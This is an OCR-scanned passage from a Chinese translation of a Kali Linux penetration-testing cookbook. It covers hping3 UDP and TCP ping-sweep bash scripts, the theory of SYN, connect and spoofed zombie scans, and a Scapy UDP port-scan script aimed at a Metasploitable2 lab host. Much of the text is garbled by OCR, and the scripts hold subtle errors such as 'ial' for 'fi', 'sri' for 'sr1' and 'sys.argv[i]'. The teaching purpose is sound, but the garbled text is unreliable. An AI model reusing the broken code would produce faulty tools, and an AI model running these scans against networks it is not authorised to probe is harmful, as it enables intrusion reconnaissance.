172.16.36.131 -c 1 | grep "Unreachable"HPING 172.16.36.132 (eth 
1 172.16.36.132): udp mode set, 28 headers + © data bytes 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
s=0 port-2836 seq-0 


--- 172.16.36.132 hping statistic -- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 115.2/115.2/115.2 ms 

--- 172.16.36.131 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 


尽管 产生 了 期 望 的 结果 ， 在 这 种 情况 下 ， grep 函数 似乎 不 能 有 效用 于 输出 。 由 
T hping3 中 的 输出 显示 处 理 ， 它 难以 通过 管道 传递 到 grep 函数 ， 并 只 提取 所 
需 的 行 ， 我 们 可 以 尝试 通过 其 他 方式 解决 这 个 问题 。 具体 来 说 ， 我 们 将 尝试 确定 输 
出 是 否 可 以 重 定向 到 一 个 文件 ， 然 后 我 们 可 以 直接 从 文件 中 grep 。 为 此 ， 我 们 
尝试 将 先前 使 用 的 两 个 命令 的 输出 传递 给 handle.txt 文件 : 


root@KaliLinux:~# hping3 --udp 172.16.36.132 -c 1 >> handle.txt 


--- 172.16.36.132 hping statistic -- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 28.6/28.6/28.6 ms 

root@KaliLinux:~# hping3 --udp 172.16.36.131 -c 1 >> handle.txt 


--- 172.16.36.131 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 

root@KaliLinux:~# ls Desktop handle.txt 

root@KaliLinux:~# cat handle.txt 

HPING 172.16.36.132 (eth1 172.16.36.132): udp mode set, 28 heade 
rs + 0 data bytes 

ICMP Port Unreachable from ip-172.16.36.132 name-UNKNOWN statu 
s-0 port-2121 seq-0 

HPING 172.16.36.131 (eth1 172.16.36.131): udp mode set, 28 heade 
rs * 0 data bytes 


虽然 这 种 尝试 并 不 完全 成 功 ， 因 为 输出 没有 完全 重 定向 到 文件 ， 我 们 可 以 看 到 通过 
读 取 文件 中 的 输出 ， 足 以 创建 一 个 有 效 的 脚本 。 具体 来 说 ， 我 们 能 够 重 定向 一 个 唯 
一 的 行 ， 该 行 只 与 成 功 的 ping 尝试 相关 联 ， 并 且 和 包含 该 行 中 相应 的 IP 地 址 。 要 
验证 此 解决 方法 是 否 可 行 ， 我 们 需要 尝试 循环 访问 / 24 范围 中 的 每 个 地 址 ， 然 后 
将 结果 传递 到 handle.txt 文件 : 


root@KaliLinux:~# for addr in $(seq 1 254); do hping3 --udp 172. 
16.36.$addr -c 1 >> handle.txt; done 

--- 172.16.36.1 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 


--- 172.16.36.2 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 

--- 172.16.36.3 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 


通过 这 样 做 ， 仍 然 有 大 量 的 输出 〈 提 供 的 输出 为 了 方便 而 被 截断 ) 包含 未 重 定向 到 
文件 的 输出 。 但 是 ， 以 下 脚本 的 成 功 不 取决 于 初始 循环 的 过 多 输出 ， 而 是 取决 于 从 
输出 文件 中 提取 必要 信息 的 能 力 : 


root@KaliLinux:~# ls 

Desktop handle.txt 

root@KaliLinux:~# grep Unreachable handle.txt 

ICMP Port Unreachable from ip-172.16.36.132 HPING 172.16.36.133 
(ethi 172.16.36.133): udp mode set, 28 headers + © data bytes 
ICMP Port Unreachable from ip-172.16.36.135 HPING 172.16.36.136 
(ethi 172.16.36.136): udp mode set, 28 headers + © data bytes 


完成 扫描 循环 后 ， 可 以 使 用 ls 命令 在 当前 目录 中 确定 输出 文件 ， 然 后 可 以 直接 从 
此 文件 中 对 Unreachable 的 唯一 字符 串 进 行 grep ， 如 下 一 个 命令 所 示 。 在 输 
出 中 ， 我 们 可 以 看 到 ， 列 出 了 通过 UDP 探测 发 现 的 每 个 活动 主机 。 此 时 ， 剩 下 的 
唯一 任务 是 从 此 输出 中 提取 IP 地 址 ， 然 后 将 此 整个 过 程 重 新 创建 为 单个 功能 脚 
A: 


root@KaliLinux:~# grep Unreachable handle.txt 

ICMP Port Unreachable from ip-172.16.36.132 

HPING 172.16.36.133 (eth1 172.16.36.133): udp mode set, 28 heade 
rs + 0 data bytes 

ICMP Port Unreachable from ip-172.16.36.135 

HPING 172.16.36.136 (eth1 172.16.36.136): udp mode set, 28 heade 
rs * 0 data bytes 


root@KaliLinux:~# grep Unreachable handle.txt | cut -d " " -f 5 
ip-172.16.36.132 ip-172.16.36.135 

root@KaliLinux:~# grep Unreachable handle.txt | cut -d " " -f 5 
[CUE eS s o2 a2 16259091320 172 16230- 135 


通过 将 输出 使 用 管道 连接 到 一 系列 cut 函数 ， 我 们 可 以 从 输出 中 提取 IP 地 址 。 
现在 我 们 已 经 成 功 地 确定 了 一 种 方法 ， 来 扫描 多 个 主机 并 轻易 识别 结果 ， 我 们 应 该 
将 其 集成 到 一 个 脚本 中 。 将 所 有 这 些 操作 组 合 在 一 起 的 功能 脚本 的 示例 如 下 : 


#!/bin/bash 
if [ "$#" -ne 1 ]; then 
echo "Usage - ./udp sweep.sh [/24 network address]" 
echo "Example - ./udp sweep.sh 172.16.36.0" 
echo "Example will perform a UDP ping sweep of the 172.16.36 
.0/24 network and output to an output.txt file" 
exit 
ial 


prefix-$(echo $1 | cut -d '.' -f 1-3) 


for addr in $(seq 1 254); do 
hping3 $prefix.$addr --udp -c 1 »» handle.txt; 
done 


grep Unreachable handle.txt | cut -d " " -f 5 | cut -d "=" -f 2 
>> output.txt 
rm handle.txt 


在 提供 的 bash 脚本 中 ， 第 一 行 定义 了 bash 解释 器 的 位 置 。 接 下 来 的 代码 块 执 行 
测试 来 确定 是 否 提供 了 预期 的 一 个 参数 。 这 通过 评估 提供 的 参数 的 数量 是 否 不 等 于 
1 来 确定 。 如 果 未 提供 预期 参数 ， 则 输出 脚本 的 用 法 ， 并 且 退 出 脚本 。 用 法 输出 表 
明 ， 脚 本 需要 接受 / 24 网 络 地 址 作为 参数 。 下 一 行 代码 从 提供 的 网 络 地 址 中 提 

取 网 络 前 级 。 例 如 ， 如 果 提 供 的 网 络 地 址 是 192.168.11.0 ， 则 前 级 变量 将 被 赋 

值 为 192.168.11 。 然后 对 / 24 范围 内 的 每 个 地 址 执行 hping3 操作 ， 并 将 每 
个 任务 的 结果 输出 放 入 handle.txt 文件 中 。 


root@KaliLinux:~# ./udp sweep.sh 
Usage - ./udp sweep.sh [/24 network address] 
Example - ./udp sweep.sh 172.16.36.0 
Example will perform a UDP ping sweep of the 172.16.36.0/24 netw 
ork and output to an output.txt file 
root@KaliLinux:~# ./udp sweep.sh 172.16.36.0 
--- 172.16.36.1 hping statistic -- 
1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 
--- 172.16.36.2 hping statistic -- 
1 packets transmitted, © packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 
--- 172.16.36.3 hping statistic -- 
1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 
*** {TRUNCATED} *** 
root@KaliLinux:~# ls output.txt 
output.txt 
root@KaliLinux:~# cat output.txt 
172.16.36.132 
172.16.36.135 
172.16.36.253 


当 脚 本 运行 时 ， 你 仍然 会 看 到 在 初始 循环 任务 时 看 到 的 大 量 输出 。 幸运 的 是 ， 你 发 
现 的 主机 列表 不 会 在 此 输出 中 消失 ， 因 为 它 每 次 都 会 写 入 你 的 输出 文件 。 


你 还 可 以 使 用 hping3 执行 TCP 发 现 。TCP 模式 实际 上 是 hping3 使 用 的 默认 
发 现 模式 ， 并 且 可 以 通过 将 要 扫描 的 IP 地 址 传递 到 hping3 来 使 用 此 模式 : 


root@KaliLinux:~# hping3 172.16.36.132 

HPING 172.16.36.132 (eth1 172.16.36.132): NO FLAGS are set, 40 h 
eaders + 0 data bytes 

len=46 ip-172.16.36.132 ttl-64 DF id=0 sport=0 flags-RA seq-0 wi 
n=0 rtt-3.7 ms 

len-46 ip-172.16.36.132 ttl-64 DF id=0 sport=0 flags-RA seq-1 wi 
n=0 rtt-0.7 ms 

len=46 ip-172.16.36.132 ttl-64 DF id=0 sport=0 flags-RA seq-2 wi 
n=0 rtt-2.6 ms 

^C 

--- 172.16.36.132 hping statistic -- 

3 packets transmitted, 3 packets received, 0% packet loss 
round-trip min/avg/max = 0.7/2.3/3.7 ms 


我 们 之 前 创建 一 个 bash 脚 本 循环 访问 / 24 网 络 并 使 用 hping3 执行 UDP 发 现 ， 
与 之 相似 ， 我 们 可 以 为 TCP 发 现 创建 一 个 类 似 的 脚本 。 首先 ， 必 须 确定 唯一 短 
语 ， 它 存在 于 活动 主机 的 相关 输出 中 ， 但 不 在 非 响 应 主机 的 相关 输出 中 。 为 此 ， 我 
们 必须 评估 每 个 响应 : 


root@KaliLinux:~# hping3 172.16.36.132 -c 1 

HPING 172.16.36.132 (eth1 172.16.36.132): NO FLAGS are set, 40 h 
eaders + 0 data bytes 

len-46 ip-172.16.36.132 ttl-64 DF id=0 sport=0 flags-RA seq-0 wi 
n=0 rtt-3.4 ms 

--- 172.16.36.132 hping statistic -- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 3.4/3.4/3.4 ms 

root@KaliLinux:~# hping3 172.16.36.131 -c 1 

HPING 172.16.36.131 (eth1 172.16.36.131): NO FLAGS are set, 40 h 
eaders + 0 data bytes 

--- 172.16.36.131 hping statistic -- 

1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max = 0.0/0.0/0.0 ms 


在 这 种 情况 下 ， 长 度 值 仅 存 在 于 活动 主机 的 相关 输出 中 。 再 一 次 ， 我 们 可 以 开发 一 
个 脚本 ， 将 输出 重 定 向 到 临时 handle 文件 ， 然 后 grep 此 文件 的 输出 来 确定 活 
动 主机 : 


#!/bin/bash 
if [ "$#" -ne 1 ]; then 
echo "Usage - ./tcp_sweep.sh [/24 network address]" 
echo "Example - ./tcp_sweep.sh 172.16.36.0" 
echo "Example will perform a TCP ping sweep of the 172.16.36 
.0/24 network and output to an output.txt file" 
exit 
fa 


prefix=$(echo $1 | cut -d '.' -f 1-3) 


for addr in $(seq 1 254); do 
hping3 $prefix.$addr -c 1 >> handle.txt; 
done 


grep len handle.txt | cut -d " " -f 2 | cut -d "=" -f 2 >> outpu 
t.txt 
rm handle.txt 


此 脚本 的 执行 方式 类 似 于 UDP 发 现 脚本 。 唯一 的 区 别 是 在 循环 序列 中 执行 的 命 
令 ，grep 值 和 提取 IP 地 址 的 过 程 。 执 行 后 ， 此 脚本 将 生成 一 个 output.txt X 
件 ， 其 中 将 包含 使 用 TCP 发 现 方式 来 发 现 的 主机 的 相关 IP 地 址 列表。 


root@KaliLinux:~# ./tcp sweep.sh 
Usage - ./tcp sweep.sh [/24 network address] 
Example - ./tcp sweep.sh 172.16.36.0 
Example will perform a TCP ping sweep of the 172.16.36.0/24 netw 
ork and output to an output.txt file 
root@KaliLinux:~# ./tcp sweep.sh 172.16.36.0 
--- 172.16.36.1 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max = 0.4/0.4/0.4 ms 
--- 172.16.36.2 hping statistic -- 
1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max - 0.6/0.6/0.6 ms 
--- 172.16.36.3 hping statistic -- 
1 packets transmitted, 0 packets received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 
*** {TRUNCATED} *** 


你 可 以 使 用 ls 命令 确认 输出 文件 是 否 已 写 入 执行 目录 ， 并 使 用 cat 4 
内 容 。 这 可 以 在 以 下 示例 中 看 到 : 


root@KaliLinux:~# ls output.txt 
output.txt 

root@KaliLinux:~# cat output.txt 
172.16.36.1 

172.16.36.2 

172.16.36.132 

172.16.36.135 

172.16.36.253 


工作 原理 


在 提供 的 示例 中 ， hping3 使 用 ICMP 主机 不 可 达 响 应 ， 来 标识 具有 UDP 请 求 的 
活动 主机 ， 并 使 用 空 标 志 扫 描 来 标识 具有 TCP 请 求 的 活动 主机 。 对 于 UDP X 

现 ， 一 系列 空 UDP 请 求 被 发 送 到 任意 目标 端口 ， 来 试图 请 求 响应 。 对 于 TCP 发 
现 ， 一 系列 TCP 请 求 被 发 送 到 目的 端口 0， 并 没有 激活 标志 位 。 所 提供 的 示例 请 
求 激活 了 ACK + RST 标志 的 响应 。 这 些 任务 中 的 每 一 个 都 传递 给 了 bash 中 的 循 
环 ， 来 在 多 个 主机 或 一 系列 地 址 上 执行 扫描 。 


第 三 章 端口 扫描 


作者 : Justin Hutchens 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


确定 目标 的 攻击 面 的 下 一 步 ， 是 识别 目标 系统 上 的 开放 端口 。 开 放 端 口 对 应 系统 上 
运行 的 联网 服务 。 编 程 错 误 或 实施 缺陷 可 能 使 这 些 服 务 存 在 漏洞 ， 有 时 可 能 导致 系 
统 的 全 面 沦 陷 。 要 为 了 定 可 能 的 攻击 向 量 ， 必 须 首 先 枚 举 项 目 范 围 内 的 所 有 远程 系 
统 上 的 开放 端口 。 这 些 开放 端口 对 应 可 以 用 UDP 或 TCP 流量 访问 的 服务 。TCP 
和 UDP 都 是 传输 协议 。 传 输 控 制 协 议 (TCP) 更 加 和 常用， 并 提供 面向 连接 的 通 
言 。 用 户 数 据 报 协议 (UDP) 是 一 种 面向 非 连 接 的 协议 ， 有 时 用 于 传输 速度 比 数据 
完整 性 更 重要 的 服务 。 用 于 枚 举 这 些 服 务 的 渗透 测试 技术 称 为 端口 扫描 。 与 上 一 章 
讨论 的 主机 发 现 不 同 ， 这 些 技术 应 该 产生 足够 的 信息 ， 来 识别 服务 是 否 与 设备 或 服 
务 器 上 的 给 定 端口 相关 。 


在 讲解 特定 秘籍 之 前 ， 我 们 首先 要 讨论 一 些 有 关 端 口 端口 的 底层 原理 ， 你 应 该 理解 
它们 。 


3.1 UDP 端口 扫描 


HT TCP 是 更 加 常用 的 传输 层 协 议 ， 使 用 UDP 的 服务 常常 被 人 遗忘 。 虽 然 UDP 

服务 本 质 上 拥有 被 忽视 的 趋势 ， 这 些 服务 可 以 枚 举 ， 用 来 完全 理解 任何 给 定 目标 的 
工具 面 ， 这 相当 关键 。UDP 扫描 通常 由 挑战 性 ， 厅 烦 ， 并 且 消 耗 时 间 。 这 一 章 的 前 
三 个 秘籍 会 涉及 如 何在 Kali 中 使 用 不 同 工 具 执行 UDP 扫描 。 理 解 UDP 扫描 可 以 

用 两 种 不 同 的 方式 执行 相当 重要 。 一 种 技巧 会 在 第 一 个 秘籍 中 强调 ， 它 仅仅 依赖 于 
ICMP 端口 不 可 达 响 应 。 这 类 型 的 扫描 依赖 于 任何 没有 比 定 菜 个 服务 的 UDP 端口 

都 会 返回 ICP 端口 不 可 达 响 应 的 假设 。 所 以 不 返回 这 种 响应 就 代表 拥有 服务 。 虽 然 
这 种 方法 在 某 些 情况 下 十 分 高 效 ， 在 主机 不 生成 端口 不 可 达 响 应 ， 或 者 端口 不 可 达 
响应 存在 速率 限制 或 被 防火 墙 过 滤 的 情况 下 ， 它 也 会 返回 不 精确 的 结果 。 一 种 替代 
方式 会 在 第 二 个 和 第 三 个 秘籍 中 讲解 ， 是 使 用 服务 特定 的 探 针 来 尝试 请 求 响应 ， 以 
表明 所 预期 的 服务 运行 在 目标 端口 上 。 这 个 方法 非常 高 效 ， 也 非常 消耗 时 间 。 


3.2 TCP 扫描 


这 一 章 中 ， 会 提 及 几 个 不 同 的 TCP 扫描 方式 。 这些 技 巧 包含 隐秘 扫描 、 连 接 扫 描 
和 僵尸 扫描 。 为 了 理解 这 些 扫描 技巧 的 原理 ， 理 解 TCP 如 何 建 立 以 及 维护 连接 十 
分 重要 。TCP 是 面向 连接 的 协议 ， 只 有 连接 在 两 个 系统 之 间 建 立 之 后 ， 数 据 才 可 以 
通过 TCP 传输 。 这 个 和 建立 TCP 连接 的 过 程 通常 使 用 三 次 握手 指 代 。 这 个 内 容 暗 
指 连接 过 程 涉 及 的 三 个 步骤 。 下 图 展示 了 这 个 过 程 : 








TCP SYN 封包 从 想 要 建立 连接 的 设备 发 送 ， 并 带 有 想 要 连接 的 设备 端口 。 如 果 和 
接收 端口 关联 的 服务 接收 了 这 个 连接 ， 它 会 向 请 求 系统 返回 TCP 封包 ， 其 中 SYN 
和 ACK 位 都 是 激活 的 。 连 接 仅仅 在 请 求 系统 发 送 TCP ACK 响应 的 情况 下 建立 。 
这 个 三 步 过 程 在 两 个 系统 之 间 建 立 了 TCP 会 话 。 所 有 TCP 端口 扫描 机 制 都 会 执行 
这 个 过 程 的 不 同 变 种 ， 来 识别 远程 主机 上 的 活动 服务 。 


连接 扫描 和 隐秘 扫描 都 非常 易于 理解 。 连 接 扫 描 会 为 每 个 扫描 端口 建立 完整 的 TCP 
连接 。 这 就 是 说 ， 对 于 每 个 扫描 的 端口 ， 会 完成 三 次 握手 。 如 果 连 接 成 功 建立 ， 端 
口 可 以 判断 为 打开 的 。 作 为 替代 ， 隐 秘 扫描 不 建立 完整 的 连接 。 隐 秘 扫描 也 指 代 
SYN 扫描 或 半 开 放 扫 描 。 对 于 每 个 扫描 的 端口 ， 指 向 目标 端口 发 送 单 个 SYN 封 
包 ， 所 有 回复 SYN+ACK 封包 的 端口 假设 为 运行 活动 服务 。 由 于 初始 系统 没有 发 送 
最 后 的 ACK， 连 接 只 开启 了 左 半边 。 这 用 于 指 代 隐秘 扫描 ， 是 因为 日 志 系 统 只 会 记 
录 建 立 的 链接 ， 不 会 记录 任何 这 种 扫描 的 痕迹 。 


这 一 章 要 讨论 的 最 后 一 种 TCP 扫描 技术 叫做 僵尸 扫描 。 人 僵尸 扫描 的 目的 是 映射 远 
程 系统 上 的 所 有 开放 端口 ， 而 不 会 产生 任何 和 系统 交互 过 的 痕迹 。 僵 尸 扫描 背后 的 
工作 原理 十 分 复杂 。 执 行 僵尸 扫描 过 程 需 要 遵循 以 下 步骤 : 


1. 将 某 个 远程 系统 看 做 你 的 僵尸 。 这 个 系统 应 该 拥有 如 下 特征 : 


o 这 个 系统 是 限制 的 ， 并 且 和 网 络 上 其 它 系 统 没有 通信 。 
o 这 个 系统 使 用 递增 的 IPID 序列 。 
2. 给 僵尸 主机 发 送 SYN+ACK 封包 并 记录 初始 IPID 值 。 


3. 将 封包 的 IP 源 地 址 伪造 成 僵尸 主机 的 IP 地 址 ， 并 将 其 发 送 给 目标 系统 。 
4. 取决 于 扫描 目标 的 端口 状态 ， 会 发 生 下 列 事情 之 一 : 


o 如 果 端 口 开 放 ， 扫 描 目 标 会 向 僵尸 主机 返回 SYN+ACK HA? 484818 P 
主机 发 送 了 之 前 的 SYN 请 求 。 这 里 ， 僵 尸 主机 会 以 RST 封包 回复 这 个 带 
路 不 明 的 SYN+ACK 封包 ， 并 且 将 IPID 值 增 加 1。 
o 如 果 端 口 关 闭 ， 扫 描 目 标 会 将 RST 响应 返回 给 僵尸 主机 ， 它 相信 僵尸 主 
机 发 送 了 之 前 的 SYN 请 求 。 如 果 这 个 值 增加 了 1， 那么 之 后 扫描 目标 上 
的 端口 关闭 ，。 如 果 这 个 值 增加 了 2， 那么 扫描 目标 的 端口 开放 。 
5. HF EWR Žž AA SYNtACK 封包 ， 并 求 出 所 返回 的 RST 响应 中 的 最 后 
的 IPID 值 。 如 果 这 个 值 增加 了 1， 那么 扫描 目标 上 的 端口 关闭 。 如 果 增 加 了 
2， 和 那么 扫描 目标 上 的 端口 开放 。 


下 面 的 图 展示 了 当 僵 尸 主机 用 于 扫描 开放 端口 时 ， 所 产生 的 交互 。 
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为 了 执行 僵尸 扫描 ， 初 始 的 SYN+SCK 请 求 应 该 发 给 僵尸 系统 来 判断 返回 RST 封 
Pay 4 ay IPID 值 。 之 后 ， 将 伪造 的 SYN 封包 发 往 目 标 咪 表 ， 带 有 僵尸 主机 的 源 
IP 地 址 。 如 果 端 口 开 放 ， 扫 描 目 标 会 将 SYN+ACK 响应 发 回 僵尸 主机 。 由 于 将 是 
主机 并 没有 实际 发 送 之 前 的 SYN 请 求 ， 它 会 将 SYN+ACK 响应 看 做 来 路 不 明 ， 并 
将 RST 请 求 发 送 回 目标 主机 ， 因 此 IPID 会 增加 1。 最 后 ， 应 该 向 僵尸 主机 发 送 另 
一 个 SYN+ACK 封包 ， 这 会 返回 RST 封包 并 再 次 增加 IPID 。 增 加 2 的 1IPID 表示 
所 有 这 些 事件 都 发 生 了 ， 目 标 端口 是 开放 的 。 反 之 ， 如 果 扫 描 目 标的 端口 是 关闭 

的 ， 会 发 生 一 系列 不 同 的 事件 ， 这 会 导致 RST 响应 的 |PID 仅仅 增加 1。 


下 面 的 图 展示 了 当 僵 尸 主机 用 于 扫描 关闭 端口 时 ， 所 产生 的 交互 。 
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如 果 目 标 端口 关闭 ， 发 往 僵尸 系统 的 RST 封包 是 之 前 伪造 的 SYN 封包 的 响应 。 由 
于 RST 封包 没有 手 造 恢 复 ， 僵 尸 系统 的 IPID 和 值 不 会 增加 。 因 此 ， 返 回 给 扫描 系统 
的 最 后 的 RST 封包 的 |PID 值 只 会 增加 1。 这 个 过 程 可 以 对 每 个 想 要 扫描 的 端口 执 
行 ， 它 可 以 用 于 映射 远程 系统 的 开放 端口 ， 而 不 需要 留 下 扫描 系统 执行 了 扫描 的 痕 


3.3 Scapy UDP 13 45 


Scapy 可 以 用 于 向 网 络 构造 和 注入 自 定义 封包 。 在 这 个 秘籍 中 ，Scapy 会 用 于 扫描 
活动 的 UDP 服务 。 这 可 以 通过 发 送 空 的 UDP 封包 给 目标 端口 ， 之 后 识别 没有 回复 
ICMP 不 可 达 响 应 的 端口 来 实现 。 


准备 


为 了 使 用 Scapy 执行 UDP 扫描 ， 你 需要 一 个 运行 UDP 网 络 服务 的 远程 服务 器 。 
这 个 例子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 的 更 
多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 这 一 节 也 需要 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 “使 用 文本 编辑 器 
*VIM 和 Nano) 。 


操作 步骤 


使 用 Scapy， 我 们 就 可 以 快速 理解 UDP 扫描 原理 背后 的 底层 规则 。 为 了 确认 任何 
给 定 端口 上 是 否 存 在 UDP 服务 ， 我 们 需要 让 服务 器 产生 响应 。 这 个 证 明 十 分 困 

难 ， 因 为 许多 UDP 服务 都 只 回复 服务 特定 的 请 求 。 任 何 特定 服务 的 知识 都 会 使 正 
面 识 别 该 服务 变 得 容易 。 但 是 ， 有 一 些 通常 技巧 可 以 用 于 判断 服务 是 否 运行 于 给 定 
的 UDP 端 己 ， 并 且 准 确 率 还 不 错 。 我 们 将 要 使 用 Scapy 操作 的 这 种 技巧 是 识别 关 
闭 的 端口 的 ICMP 不 可 达 响 应 。 为 了 向 任何 给 定 端口 发 送 UDP 请 求 ， 我 们 首先 需 
要 构建 这 个 请 求 的 一 些 层面 ， 我 们 需要 构建 的 第 一 层 就 是 IP Be 


root@KaliLinux:~# scapy 
Welcome to Scapy (2.2.0) 
>>> i = IP() 
>>> i.display() 
HHH [ IP ]### 

version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 


chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 
>>> i.dst = "172.16.36.135" 
>>> i.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 
chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 


为 了 构建 请 求 的 IP 层 ， 我 们 需要 将 IP TARARE i 。 通 过 调用 display à 
数 ， 我 们 可 以 确定 对 象 的 属性 配置 。 通 常 ， 发 送 和 接受 地 址 都 设 为 回 送 地 

a> 127.0.0.1 。 这 些 值 可 以 通过 修改 目标 地 址 来 修改 ， 也 就 是 设置 i.dst 为 
想 要 扫描 的 地 址 的 字符 串 值 。 通 过 再 次 调用 dislay 函数 ， 我 们 看 到 不 仅仅 更 新 的 
目标 地 址 ， 也 自动 更 新 了 和 默认 接口 相关 的 源 IP 地 址 。 现 在 我 们 构建 了 请 求 的 IP 
层 ， 我 们 可 以 构建 UDP ÆT ° 


>>> u = UDP() 

>>> u.display() 

###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 

>>> u.dport 

53 


为 了 构建 请 KH UDP 层 ， 我 们 使 用 和 IP 层 相 同 的 技巧 。 在 这 个 立即 中 ， UDP 对 
KIRA T u 变量 。 像 之 前 提 到 的 那样 ， 默 认 的 配置 可 以 通过 调用 display 函数 
来 确定 。 这 里 ， 我 们 可 以 看 到 来 源 和 目标 端口 的 默认 值 都 是 domain 。 你 可 能 已 经 
猜 到 了 ， 它 表示 和 端口 53 相关 的 DNS 服务 。DNS 是 个 常见 服务 ， 
系 统 上 发 现 。 为 了 确认 它 ， 我 们 可 以 通过 引用 变量 名 称 和 数量 直接 调用 该 值 。 
后 ， 可 以 通过 将 属性 设置 为 新 的 目标 端口 值 来 修改 。 


>>> u.dport = 123 

>>> u.display() 

###[ UDP ]### 
sport= domain 
dport= ntp 
len= None 
chksum= None 


在 上 面 的 例子 中 ， 目 标 端口 设 为 123 ， 这 是 NTP 的 端口 。 既 然 我 们 创建 了 IP 和 
UDP 层 ， 我 们 需要 通过 县 放 这 些 层 来 构造 请 求 。 


>>> request = (i/u) 

>>> request.display() 

###[ IP ]### 
version= 4 


ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag= 0 
ttl= 64 
proto= udp 


chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 

###[ UDP ]### 
sport= domain 
dport= ntp 
len= None 
chksum= None 
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量 ， 它 代表 整个 请 求 。 我 们 之 后 可 以 调用 dispaly 函数 来 查看 请 求 的 配置 。 一 旦 
构建 了 请 求 ， 可 以 将 其 传递 给 sra 函数 来 分 析 响 应 : 


>>> response = sri(request) 
Begin emission: 
jn Finished to send 1 packets. 


Received 11 packets, got 1 answers, remaining © packets 
>>> response.display() 
###[ IP ]### 

version= 4L 


ihl- 5L 
tos= OxcO 
len- 56 
id- 63687 
flags- 
frag- OL 
ttl- 64 


proto- icmp 
chksum- Oxdfe1i 
src- 172.16.36.135 
dst- 172.16.36.180 
\options\ 

###[ ICMP ]### 
type= dest-unreach 
code= port-unreachable 
chksum- 0x9e72 
unused- 0 

###[ IP in ICMP ]### 
version= 4L 


ihl= 5L 
tos= 0x0 
len= 28 
id= 1 
flags= 
frag- OL 
ttl= 64 
proto= udp 


chksum= 0xd974 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 

###[ UDP in ICMP ]### 
sport= domain 
dport= ntp 
len- 8 
chksum- 0x5dd2 
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令 ， 通 过 直接 调用 函数 并 传递 合适 的 参数 : 


>>> sri(IP(dst="172.16.36.135")/UDP(dport=123) ) 
..Begin emission: 
...*Finished to send 1 packets. 


Received 6 packets, got 1 answers, remaining 0 packets 

«IP version=4L ihl-5L tos=0xcO len-56 id=63689 flags= frag=OL t 
tl-64 proto=icmp chksum=Oxdfdf src=172.16.36.135 dst-172.16.36.1 
80 options-[] |«ICMP type=dest-unreach code-port-unreachable ch 
ksum=0x9e72 unused=0 |«IPerror version=4L ihl-5L tos=0x0 len-28 
id=1 flags= frag-OL ttl-64 proto-udp chksum=0xd974 src-172.16.3 
6.180 dst-172.16.36.135 options-[] |«UDPerror sport=domain dpor 
t-ntp len=8 chksum=0x5dd2 |>>>> 


要 注意 这 些 请 求 的 响应 包括 ICMP 封包 ， 它 的 type 表示 主机 不 可 达 ， 它 

的 code 表示 端口 不 可 达 。 这 个 响应 通常 在 UDP 端口 关闭 时 返回 。 现 在 ， 我 们 应 
该 尝试 修 改 请 求 ， 使 其 发 送 到 对 应 远程 系统 上 的 首 正 服务 的 目标 端口 。 为 了 实现 
它 ， 我 们 将 目标 端口 修改 会 53 ， 之 后 再 次 发 送 请 求 ， 像 这 样 : 


>>> response = sri(IP(dst="172.16.36.135")/UDP(dport=53), timeout 
=1, verbo se=1) 

Begin emission: 

Finished to send 1 packets. 


Received 8 packets, got 0 answers, remaining 1 packets 
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的 UDP 端口 53 上 ， 仅 仅 响应 服务 特定 的 请 求 。 这 一 差异 可 以 用 于 扫描 ICMP 不 可 
达 响 应 ， 我 们 可 以 通过 扫描 无 响应 的 端口 来 确定 潜在 的 服务 : 


#!/usr/bin/python 


import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 


from scapy.all import * 
import time 
import sys 


if len(sys.argv) != 4: 

print "Usage - ./udp scan.py [Target-IP] [First Port] [Last 
Port]" 

print "Example - .7udpsscan-py 10.0.0-5 1 409^ 

print "Example will UDP port scan ports 1 through 100 on 10. 
9310. 5 
sys.exit() 


ip = sys.argv[i] 
start = int(sys.argv[2]) 
end = int(sys.argv[3] ) 


for port in range(start,end): 
ans = sri(IP(dst=ip)/UDP(dport=port), timeout=5, verbose=0) 
time.sleep(1) 


if ans == None: 
print port 
else: 
pass 


上 面 的 Python 脚本 向 序列 中 前 一 psi Er: 个 端口 发 送 UDP 请 求 。 这 里 没有 
接受 到 任何 响应 ， 端 口 可 以 认为 是 开放 的 。 通 过 运行 这 个 脚本 ， 我 们 可 以 识别 所 有 
不 返回 ICMP 不 可 达 响 应 的 端口 : 


